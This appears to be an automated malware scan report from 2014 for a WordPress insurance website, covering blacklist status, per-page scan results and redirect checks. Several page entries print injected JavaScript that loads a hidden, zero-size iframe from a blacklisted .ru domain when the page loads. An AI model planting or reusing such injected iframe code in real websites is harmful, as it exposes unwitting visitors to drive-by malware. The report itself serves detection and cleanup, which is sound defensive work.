Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=insurancesolutionsdirect.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://insurancesolutionsdirect.net/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://insurancesolutionsdirect.net/ | 200 OK Content-Length: 15250 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[308 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function o3aiz3e(){ create_frame("http://nvdrabs.ru/gujhvud.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', o3aiz3e); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); o3aiz3e(); }; window.onload = newonload; } else { window.onload = o3aiz3e; } } } catch(err) {} Decoded script: function o3aiz3e() { create_frame("http://nvdrabs.ru/gujhvud.cgi?default"); } | ||
http://insurancesolutionsdirect.net/contact | 200 OK Content-Length: 17289 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[304 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function c3k13m1(){ create_frame("http://nvdrabs.ru/nuxtumt.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', c3k13m1); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); c3k13m1(); }; window.onload = newonload; } else { window.onload = c3k13m1; } } } catch(err) {} Decoded script: function c3k13m1() { create_frame("http://nvdrabs.ru/nuxtumt.cgi?default"); } | ||
http://insurancesolutionsdirect.net/wp-content/plugins/formidable/js/formidable.js?ver=1.05.03 | 200 OK Content-Length: 8193 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/test404page.js | 404 Not Found Content-Length: 12405 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nvdrabs.ru ...[13597 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 5oemepo(){ create_frame("http://nvdrabs.ru/ogdmdfg.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 5oemepo); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 5oemepo(); }; window.onload = newonload; } else { window.onload = 5oemepo; } ...[54 bytes skipped]... | ||
http://insurancesolutionsdirect.net/wp-includes/js/l10n.js?ver=20101110 | 200 OK Content-Length: 308 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-includes/js/jquery/jquery.js?ver=1.6.1 | 200 OK Content-Length: 91363 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/plugins/events-calendar-premium/resources/events.js?ver=3.2.1 | 200 OK Content-Length: 1355 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.2 | 200 OK Content-Length: 9808 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js?ver=2.88 | 200 OK Content-Length: 31032 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/plugins/nextgen-gallery/js/ngg.slideshow.min.js?ver=1.05 | 200 OK Content-Length: 1750 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/themes/dandelion_v2.6.6/script/jquery.prettyPhoto.js | 200 OK Content-Length: 21810 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/themes/dandelion_v2.6.6/script/jquery.tools.min.js | 200 OK Content-Length: 12445 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/wp-content/themes/dandelion_v2.6.6/script/script.js | 200 OK Content-Length: 11581 Content-Type: application/x-javascript | clean |
http://insurancesolutionsdirect.net/about | 200 OK Content-Length: 14552 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: nvdrabs.ru ...[310 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function sodlc1p(){ create_frame("http://nvdrabs.ru/kglzntf.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', sodlc1p); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); sodlc1p(); }; window.onload = newonload; } else { window.onload = sodlc1p; } } } catch(err) {} Decoded script: function sodlc1p() { create_frame("http://nvdrabs.ru/kglzntf.cgi?default"); } | ||
http://insurancesolutionsdirect.net/services | 200 OK Content-Length: 15502 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: nvdrabs.ru ...[6383 bytes skipped]... = "0px"; iframe.style.height = "0px"; iframe.style.border = "0px"; iframe.frameBorder = "0"; iframe.style.display = "none"; iframe.setAttribute("frameBorder", "0"); document.body.appendChild(iframe); iframe.src = url; return true; } } function 3pzj1wj(){ create_frame("http://nvdrabs.ru/ufvctsc.cgi?default"); } try { if(window.attachEvent) { window.attachEvent('onload', 3pzj1wj); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); 3pzj1wj(); }; window.onload = newonload; } else { window.onload = 3pzj1wj; ...[55 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: insurancesolutionsdirect.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 May 2014 06:36:11 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-fflnkphn=A5E95A404A4704DC777997BCB187DFE2; path=/
Set-Cookie: PHPSESSID=it0utkcrfmrq20r0764p532s74; path=/
X-Pingback: http://insurancesolutionsdirect.net/xmlrpc.php
GET / HTTP/1.1
Host: insurancesolutionsdirect.net
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 May 2014 06:36:11 GMT
Pragma: no-cache
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: X-Mapping-fflnkphn=A5E95A404A4704DC777997BCB187DFE2; path=/
Set-Cookie: PHPSESSID=it0utkcrfmrq20r0764p532s74; path=/
X-Pingback: http://insurancesolutionsdirect.net/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: insurancesolutionsdirect.net
Referer: http://www.google.com/search?q=insurancesolutionsdirect.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: insurancesolutionsdirect.net
Referer: http://www.google.com/search?q=insurancesolutionsdirect.net
Result:
The result is similar to the first query. There are no suspicious redirects found.